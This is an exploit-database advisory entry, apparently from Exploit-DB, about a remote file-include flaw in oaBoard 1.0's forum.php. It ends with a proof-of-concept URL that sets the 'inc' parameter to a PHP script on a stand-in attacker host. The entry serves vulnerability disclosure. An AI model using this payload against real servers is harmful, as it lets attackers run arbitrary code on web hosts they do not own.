OABoard 1.0 Forum - Remote File Inclusion

EDB-ID:

26998




Platform:

PHP

Date:

2005-12-29


source: https://www.securityfocus.com/bid/16105/info

The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application.

This could result in the execution of arbitrary PHP code in the context of the webserver hosting the application. 

http://oaboard.example.com/oaboard_en/forum.php?inc=http://attacker.example.com/code.php